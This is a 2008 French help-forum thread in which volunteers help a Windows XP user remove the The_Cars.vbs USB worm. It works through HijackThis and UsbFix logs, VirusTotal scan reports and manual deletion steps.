The_Cars virus Résolu

Question

Bonjour,

je suis infecté par ce virus The_Cars.

Aidez moi à l'é liminer SVP

merci


J'ai fait Clique sur Do a scan system and save log file 
sur ce lien 
http://www.trendsecure.com/portal/en-US/_download/HJTInstall.exe 
et ça donne ce qui suit:



Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:41:51, on 06/11/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\ZMSoft\HParlant\HParlante.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\Fichiers communs\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\svchost.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\SuperCopier2\SuperCopier2.exe
C:\PROGRA~1\MI3AA1~1\wcescomm.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\PROGRA~1\MI3AA1~1apimgr.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Java\jre1.6.0_03\bin\jucheck.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
R3 - URLSearchHook: (no name) - {F4F10C1D-87C7-404A-B4B3-000000000000} - (no file)
R3 - URLSearchHook: SearchSettings Class - {E312764E-7706-43F1-8DAB-FCDD2B1E416D} - C:\Program Files\Search Settings\kb127\SearchSettings.dll
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,userinit.exe
O1 - Hosts: 65.54.239.80 messenger.hotmail.com
O1 - Hosts: 65.54.239.80 dp.msnmessenger.akadns.net
O1 - Hosts: 65.54.239.80 messenger.hotmail.com
O1 - Hosts: 65.54.239.80 dp.msnmessenger.akadns.net
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: SmartShopper - {2BA1C226-EC1B-4471-A65F-D0688AC6EE3A} - C:\Program Files\SmartShopper\Bin\2.5.0\SmrtShpr.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.1.807.1746\swg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe"
O4 - HKLM\..\Run: [Horloge Parlante ZMSoft] C:\ZMSoft\HParlant\HParlante.exe
O4 - HKLM\..\Run: [SearchSettings] C:\Program Files\Search Settings\SearchSettings.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [FIXEDFON.FON] C:\WINDOWS\system32\Win32.vbs
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [SuperCopier2.exe] C:\Program Files\SuperCopier2\SuperCopier2.exe
O4 - HKCU\..\Run: [Messenger (Yahoo!)] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\PROGRA~1\MI3AA1~1\wcescomm.exe"
O4 - Startup: µTorrent.lnk = C:\Program Files\uTorrent\uTorrent.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: &Reduire avec Alice's Biscuit - C:\Program Files\kayenko\alice's biscuit\alice.htm
O8 - Extra context menu item: &Search - http://edits.mywebsearch.com/toolbaredits/menusearch.jhtml?p=ZCxdm873YYNL
O8 - Extra context menu item: &Télécharger avec NetTransport - C:\Program Files\Xi\NetTransport 2\NTAddLink.html
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Tout t&élécharger avec NetTransport - C:\Program Files\Xi\NetTransport 2\NTAddList.html
O8 - Extra context menu item: Télécharger avec &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra 'Tools' menuitem: Créer un favori mobile... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: SmartShopper - Compare product prices - {3CC3D8FE-F0E0-4dd1-A69A-8C56BCC7BEBF} - C:\Program Files\SmartShopper\Bin\2.5.0\SmrtShpr.dll
O9 - Extra button: SmartShopper - Compare travel rates - {3CC3D8FE-F0E0-4dd1-A69A-8C56BCC7BEC0} - C:\Program Files\SmartShopper\Bin\2.5.0\SmrtShpr.dll
O9 - Extra button: Recherche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O10 - Unknown file in Winsock LSP: c:\windows\system32
wprovau.dll
O16 - DPF: CabBuilder - http://kiw.imgag.com/imgag/kiw/toolbar/download/InstallerControl.cab
O16 - DPF: {1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB} - http://ak.exe.imgfarm.com/images/nocache/funwebproducts/ei-3/CursorManiaFWBInitialSetup1.0.1.0.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - http://gfx2.hotmail.com/mail/w2/resources/MSNPUpld.cab
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: My Web Search Service (MyWebSearchService) - Unknown owner - C:\PROGRA~1\MYWEBS~1\bar\1.bin\mwssvc.exe (file missing)

Lyonnais92 · Answer

Bonjour,

--> Télécharge UsbFix (de Chiquitine29) sur ton Bureau :
http://sd-1.archive-host.com/membres/up/116615172019703188/UsbFix.exe

--> Lance l'installation avec les paramètres par défaut.

--> Branche tes sources de données externes à ton PC (clé USB, disque dur externe, etc...) sans les ouvrir.

--> Double-clique sur le raccourci UsbFix sur ton Bureau.

--> Le PC va redémarrer.

--> Après redémarrage, poste le rapport UsbFix.txt

Note : le rapport UsbFix.txt est sauvegardé à la racine du disque.

(Si le Bureau ne réapparait pas, presse Ctrl+Alt+Suppr, Onglet "Fichier", "Nouvelle tâche", tape explorer.exe et valide)

ducashaa · Answer

Voici le rapport UsbFix


-------------- UsbFix V2.395 ---------------

* User : ups - PERSO
* Outils mis a jours le 03/11/2008 par Chiquitine29 et Chimay8
* Recherche effectuée à 12:36:42 le 06/11/2008
* Windows Xp - Internet Explorer 6.0.2900.2180 
  
  
--------------- [ Processus actifs ] ----------------   
  
 
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\DOCUME~1\ups\LOCALS~1\Temp\1.tmp\b2e.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\ZMSoft\HParlant\HParlante.exe
C:\Program Files\Search Settings\SearchSettings.exe
C:\Program Files\Fichiers communs\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\svchost.exe
  
--------------- [ Informations lecteurs ] ----------------   
  
C: - Lecteur fixe

E: - Lecteur amovible

F: - Lecteur amovible

  
--------------- [ Registre / Startup ] ----------------   
 

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SunJavaUpdateSched	REG_SZ	"C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe"
    Horloge Parlante ZMSoft	REG_SZ	C:\ZMSoft\HParlant\HParlante.exe
    SearchSettings	REG_SZ	C:\Program Files\Search Settings\SearchSettings.exe
    Adobe Reader Speed Launcher	REG_SZ	"C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
    FIXEDFON.FON	REG_SZ	C:\WINDOWS\system32\Win32.vbs

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\OptionalComponents

! REG.EXE VERSION 3.0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    MsnMsgr	REG_SZ	"C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
    ctfmon.exe	REG_SZ	C:\WINDOWS\system32\ctfmon.exe
    swg	REG_SZ	C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
    SuperCopier2.exe	REG_SZ	C:\Program Files\SuperCopier2\SuperCopier2.exe
    Messenger (Yahoo!)	REG_SZ	"C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
    H/PC Connection Agent	REG_SZ	"C:\PROGRA~1\MI3AA1~1\wcescomm.exe"
  
--------------- [ Registre / Mountpoint2 ] ----------------   
  
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{306f4b50-836d-11da-ae57-0002a5264c68}\Shell\AutoRun\command  
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{306f4b50-836d-11da-ae57-0002a5264c68}\Shell\explore\Command  
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{306f4b50-836d-11da-ae57-0002a5264c68}\Shell\open\Command  
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3d8e9035-cd6c-11dc-ae64-0002a5264c68}\Shell\AutoRun\command  
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a28d8644-9914-11dd-b0f5-0002a5264c68}\Shell\AutoRun\command  
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a28d8644-9914-11dd-b0f5-0002a5264c68}\Shell\explore\Command  
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a28d8644-9914-11dd-b0f5-0002a5264c68}\Shell\open\Command  
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a96f81a3-14f2-11dd-af62-0002a5264c68}\Shell\AutoRun\command  
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ff5aad08-fa44-11dc-aef3-0002a5264c68}\Shell\AutoRun\command  
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ff5aad08-fa44-11dc-aef3-0002a5264c68}\Shell\explore\Command  
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ff5aad08-fa44-11dc-aef3-0002a5264c68}\Shell\open\Command  
  
--------------- [ Nettoyage des disques ] ----------------   
   
  
--------------- [ Listing des fichiers présents ] ----------------   
  
 -> /!\ Le resultat doit etre interprété par un spécialiste  /!\   
  
[12/01/2006 11:54][--a------] C:\AUTOEXEC.BAT   
[03/08/2004 20:38][-rahs----] C:\NTDETECT.COM   
[09/04/2008 13:17][--a------] C:\DVD-GO.exe   
[09/04/2008 13:17][--a------] C:\InstallRecus.exe   
[09/04/2008 13:17][--a------] C:\lj1020_1022-HB-pnp-win32-fr.exe   
[17/06/2008 14:23][---hs----] C:\boot.ini   
[23/10/2008 11:45][--a------] E:\The_Cars.vbs   
[23/10/2008 11:45][--a------] F:\The_Cars.vbs   
 
--------------- ! Fin du rapport ! ----------------

Lyonnais92 · Answer

Re,

tu as des logiciels "rares". On va les vérifier.

Rends toi sur ce site :

https://www.virustotal.com/gui/

Clique sur parcourir et cherche ce fichier : C:\DVD-GO.exe 
Clique sur Send File.

Un rapport va s'élaborer ligne à ligne.

Attends la fin. Il doit comprendre la taille du fichier envoyé.

Sauvegarde le rapport avec le bloc-note.

Copie le dans ta réponse. 

---------

Fais de même avec : 

C:\InstallRecus.exe 

--------

Branche tes clés amovibles. Ne clique pas.

Ouvre l'explorateur Windows et cherche The_Cars.vbs 
 sur chacune d'entre elles.

Fais un clic droit et supprimer.

Vide la Corbeille.

ducashaa · Answer

Rapport sur C:\DVD-GO.exe 

Fichier DVD-GO.exe reçu le 2008.11.06 16:59:15 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE 


Résultat: 0/36 (0%)
en train de charger les informations du serveur... 
Votre fichier est dans la file d'attente, en position: ___.
L'heure estimée de démarrage est entre ___ et ___ .
Ne fermez pas la fenêtre avant la fin de l'analyse. 
L'analyseur qui traitait votre fichier est actuellement stoppé, nous allons attendre quelques secondes pour tenter de récupérer vos résultats.
Si vous attendez depuis plus de cinq minutes, vous devez renvoyer votre fichier. 
Votre fichier est, en ce moment, en cours d'analyse par VirusTotal,
les résultats seront affichés au fur et à mesure de leur génération. 
 Formaté Impression des résultats  
Votre fichier a expiré ou n'existe pas. 
Le service est en ce moment, stoppé, votre fichier attend d'être analysé (position : ) depuis une durée indéfinie.

Vous pouvez attendre une réponse du Web (re-chargement automatique) ou taper votre e-mail dans le formulaire ci-dessous et cliquer "Demande" pour que le système vous envoie une notification quand l'analyse sera terminée. 
 Email:  
  

Antivirus Version Dernière mise à jour Résultat 
AhnLab-V3 2008.11.5.3 2008.11.06 - 
AntiVir 7.9.0.26 2008.11.06 - 
Authentium 5.1.0.4 2008.11.06 - 
Avast 4.8.1248.0 2008.11.06 - 
AVG 8.0.0.161 2008.11.06 - 
BitDefender 7.2 2008.11.06 - 
CAT-QuickHeal 9.50 2008.11.04 - 
ClamAV 0.94.1 2008.11.06 - 
DrWeb 4.44.0.09170 2008.11.06 - 
eSafe 7.0.17.0 2008.11.06 - 
eTrust-Vet 31.6.6195 2008.11.06 - 
Ewido 4.0 2008.11.06 - 
F-Prot 4.4.4.56 2008.11.06 - 
F-Secure 8.0.14332.0 2008.11.06 - 
Fortinet 3.117.0.0 2008.11.06 - 
GData 19 2008.11.06 - 
Ikarus T3.1.1.45.0 2008.11.06 - 
K7AntiVirus 7.10.517 2008.11.05 - 
Kaspersky 7.0.0.125 2008.11.06 - 
McAfee 5425 2008.11.05 - 
Microsoft 1.4005 2008.11.06 - 
NOD32 3591 2008.11.06 - 
Norman 5.80.02 2008.11.06 - 
Panda 9.0.0.4 2008.11.05 - 
PCTools 4.4.2.0 2008.11.06 - 
Prevx1 V2 2008.11.06 - 
Rising 21.02.32.00 2008.11.06 - 
SecureWeb-Gateway 6.7.6 2008.11.06 - 
Sophos 4.35.0 2008.11.06 - 
Sunbelt 3.1.1783.2 2008.11.05 - 
Symantec 10 2008.11.06 - 
TheHacker 6.3.1.1.141 2008.11.05 - 
TrendMicro 8.700.0.1004 2008.11.06 - 
VBA32 3.12.8.9 2008.11.05 - 
ViRobot 2008.11.6.1455 2008.11.06 - 
VirusBuster 4.5.11.0 2008.11.06 - 
Information additionnelle 
File size: 10969783 bytes 
MD5...: 7b01f85b682305d0ac16f31ba0b19fec 
SHA1..: 4fbc4bcc618f554821e36af62d8533f6dab6e75d 
SHA256: a534bc178a987d528784aab327d274cf61fa4707718d3150184161a0b75361a8 
SHA512: 0fbffba865eb688fa94a9d74743f18afb9ad6115222536e8fbf47a7dea7ec939
e145b7c55a4e0c5bb3715f13e6093a6ad09ec297e1d7e5f6e8463726eae32f87 
PEiD..: - 
TrID..: File type identification
Win32 Executable Generic (38.4%)
Win32 Dynamic Link Library (generic) (34.1%)
Win16/32 Executable Delphi generic (9.3%)
Generic Win/DOS Executable (9.0%)
DOS Executable Generic (9.0%) 
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x409a58
timedatestamp.....: 0x2a425e19 (Fri Jun 19 22:22:17 1992)
machinetype.......: 0x14c (I386)

( 8 sections )
name viradd virsiz rawdsiz ntrpy md5
CODE 0x1000 0x9174 0x9200 6.57 ea92e1415bc80e2738e334267ebbb921
DATA 0xb000 0x24c 0x400 2.74 f96da19d2571a42bdff1b9e8bd62ec99
BSS 0xc000 0xe48 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.idata 0xd000 0x950 0xa00 4.43 bb5485bf968b970e5ea81292af2acdba
.tls 0xe000 0x8 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.rdata 0xf000 0x18 0x200 0.20 9ba824905bf9c7922b6fc87a38b74366
.reloc 0x10000 0x8b4 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.rsrc 0x11000 0x2a00 0x2a00 4.49 632f42286c0590e6dec1c7c68f54b560

( 8 imports ) 
> kernel32.dll: DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
> user32.dll: MessageBoxA
> oleaut32.dll: VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
> advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
> kernel32.dll: WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
> user32.dll: TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
> comctl32.dll: InitCommonControls
> advapi32.dll: AdjustTokenPrivileges

( 0 exports ) 
 


 ATTENTION: VirusTotal est un service gratuit offert par Hispasec Sistemas. Il n'y a aucune garantie quant à la disponibilité et la continuité de ce service. Bien que le taux de détection permis par l'utilisation de multiples moteurs antivirus soit bien supérieur à celui offert par seulement un produit, ces résultats NE garantissent PAS qu'un fichier est sans danger. Il n'y a actuellement aucune solution qui offre un taux d'efficacité de 100% pour la détection des virus et malwares. 








Rapport sur C:\InstallRecus.exe 

Fichier InstallRecus.exe reçu le 2008.11.06 17:20:57 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE 


Résultat: 4/36 (11.12%)
en train de charger les informations du serveur... 
Votre fichier est dans la file d'attente, en position: ___.
L'heure estimée de démarrage est entre ___ et ___ .
Ne fermez pas la fenêtre avant la fin de l'analyse. 
L'analyseur qui traitait votre fichier est actuellement stoppé, nous allons attendre quelques secondes pour tenter de récupérer vos résultats.
Si vous attendez depuis plus de cinq minutes, vous devez renvoyer votre fichier. 
Votre fichier est, en ce moment, en cours d'analyse par VirusTotal,
les résultats seront affichés au fur et à mesure de leur génération. 
 Formaté Impression des résultats  
Votre fichier a expiré ou n'existe pas. 
Le service est en ce moment, stoppé, votre fichier attend d'être analysé (position : ) depuis une durée indéfinie.

Vous pouvez attendre une réponse du Web (re-chargement automatique) ou taper votre e-mail dans le formulaire ci-dessous et cliquer "Demande" pour que le système vous envoie une notification quand l'analyse sera terminée. 
 Email:  
  

Antivirus Version Dernière mise à jour Résultat 
AhnLab-V3 2008.11.5.3 2008.11.06 - 
AntiVir 7.9.0.26 2008.11.06 - 
Authentium 5.1.0.4 2008.11.06 - 
Avast 4.8.1248.0 2008.11.06 - 
AVG 8.0.0.161 2008.11.06 - 
BitDefender 7.2 2008.11.06 - 
CAT-QuickHeal 9.50 2008.11.04 - 
ClamAV 0.94.1 2008.11.06 - 
DrWeb 4.44.0.09170 2008.11.06 - 
eSafe 7.0.17.0 2008.11.06 Suspicious File 
eTrust-Vet 31.6.6195 2008.11.06 - 
Ewido 4.0 2008.11.06 - 
F-Prot 4.4.4.56 2008.11.06 - 
F-Secure 8.0.14332.0 2008.11.06 - 
Fortinet 3.117.0.0 2008.11.06 - 
GData 19 2008.11.06 - 
Ikarus T3.1.1.45.0 2008.11.06 - 
K7AntiVirus 7.10.517 2008.11.05 - 
Kaspersky 7.0.0.125 2008.11.06 - 
McAfee 5425 2008.11.05 - 
Microsoft 1.4005 2008.11.06 - 
NOD32 3591 2008.11.06 - 
Norman 5.80.02 2008.11.06 - 
Panda 9.0.0.4 2008.11.05 Suspicious file 
PCTools 4.4.2.0 2008.11.06 - 
Prevx1 V2 2008.11.06 Suspicious 
Rising 21.02.32.00 2008.11.06 - 
SecureWeb-Gateway 6.7.6 2008.11.06 - 
Sophos 4.35.0 2008.11.06 - 
Sunbelt 3.1.1783.2 2008.11.05 - 
Symantec 10 2008.11.06 - 
TheHacker 6.3.1.1.141 2008.11.05 Adware/EShoper.bg 
TrendMicro 8.700.0.1004 2008.11.06 - 
VBA32 3.12.8.9 2008.11.05 - 
ViRobot 2008.11.6.1455 2008.11.06 - 
VirusBuster 4.5.11.0 2008.11.06 - 
Information additionnelle 
File size: 3910488 bytes 
MD5...: 13c8b389edc63d4b4a49a3a7245b28b3 
SHA1..: d44b8843152b0949b47f4d337f04bf3ef71bcb0e 
SHA256: 2e3969ed6d479569af0fdbf7b2d92bb50be22dc255417f5f626e1b00a3b216f8 
SHA512: 1bc9ffc61001e4de7e6b1ad46ee586f60da57344d68830247f091bead07e136a
b736b896991281e4a8a80409bfe16015a4b17673fa5a0d1dd79ebcc26b56110e 
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser 
TrID..: File type identification
UPX compressed Win32 Executable (39.5%)
Win32 EXE Yoda's Crypter (34.3%)
Win32 Executable Generic (11.0%)
Win32 Dynamic Link Library (generic) (9.8%)
Generic Win/DOS Executable (2.5%) 
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x42e560
timedatestamp.....: 0x41c29fc0 (Fri Dec 17 08:58:40 2004)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x1b000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x1c000 0x13000 0x12800 7.91 10cd1c358086742ec823075fbfd51831
.rsrc 0x2f000 0x3000 0x2c00 4.90 25eaa05361a1d67b8ab13f15e6449532

( 9 imports ) 
> KERNEL32.DLL: LoadLibraryA, GetProcAddress, ExitProcess
> ADVAPI32.dll: RegCloseKey
> COMCTL32.dll: -
> comdlg32.dll: GetOpenFileNameA
> GDI32.dll: BitBlt
> ole32.dll: CoGetMalloc
> SHELL32.dll: DragFinish
> USER32.dll: IsIconic
> VERSION.dll: VerFindFileA

( 0 exports ) 
 
Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=906FD69A582FC7DAABE43BEE3C6B6200B3D15A1F 
packers (Kaspersky): UPX, ASPack, ASPack, ASPack 
packers (F-Prot): UPX 


 ATTENTION: VirusTotal est un service gratuit offert par Hispasec Sistemas. Il n'y a aucune garantie quant à la disponibilité et la continuité de ce service. Bien que le taux de détection permis par l'utilisation de multiples moteurs antivirus soit bien supérieur à celui offert par seulement un produit, ces résultats NE garantissent PAS qu'un fichier est sans danger. Il n'y a actuellement aucune solution qui offre un taux d'efficacité de 100% pour la détection des virus et malwares. 




The_Cars.vbs supprimé de mes clés amovibles. 

Corbeille vidée

Lyonnais92 · Answer

Re,

sais tu d'où viens et à quoi sert ce programme ?

ducashaa · Answer

kèl programme?

Lyonnais92 · Answer

Re,

oui, pardon le dernier :

C:\InstallRecus.exe

ducashaa · Answer

de quel programme tu parles? stp, je ne te suis pas

merci de m'éclairer

Lyonnais92 · Answer

re,

on s'est croisé, je parle de 

C:\InstallRecus.exe

Utilisateur anonyme · Answer

Salut ducashaa


en attendant lyonnais

peux tu fare ceci stp

rend toi a ce fichier :  C:\WINDOWS\system32\Win32.vbs 


fais un clic droit dessus et choisi modifier 

puis copie colle son contenu pour me l adresser en messagerie privé si tu es daccord :

http://www.commentcamarche.net/communaute/profil Chiquitine29


merci par avance

ducashaa · Answer

C:\InstallRecus.exe 
 ça vient d'un Logiciel que j'avais télécharger sur le net. quand j'ai voulu l'installer, j'ai reçu un message d'erreur et j'ai laissé tomber.
seulement je me souviens pas du logiciel

bibi440 · Answer

hum si tu avais activer un autre site en même temps il se peux que quand il t'est afficher <> il était partiellement sur le site et après il c'est rediriger vers ton ordi pour y foutre la merde

ducashaa · Answer

merci,
comment me débarrasser de cette merde là maintenant?

Lyonnais92 · Answer

Bonsoir,

on va essayer simple :

ouvre l'Explorateur Windows, cherche C:\InstallRecus.exe 

fais un clic droit et choisis supprimer. Pas d'acharnement si il ne veut pas.

----------------------------

Télécharge Toolbar-S&D (Team IDN) sur ton Bureau :

https://77b4795d-a-62cb3a1a-s-sites.googlegroups.com/site/eric71mespages/ToolBarSD.exe?attachauth=ANoY7cqJWPphpudyTqv7TRo5RQ3nm_Sx8JluVMO59X5E9cyE3j3LqKlmStIqiDqJdIgMJLi7MXn2nKVajQfoWuVvZZ2wIx_vkqO4k4P0K9jh-ra9jaKPXdZcoaVF2UqJZNH8ubL_42uIwh6f35xJ2GJMuzddVj2Qth1DgZ839lxEIFGkgWz3TdfvNMy-YtxfA3gqBUrj4U4LFeAPiWr3ClmjIP0t_Xs5PQ%3D%3D&attredirects=2

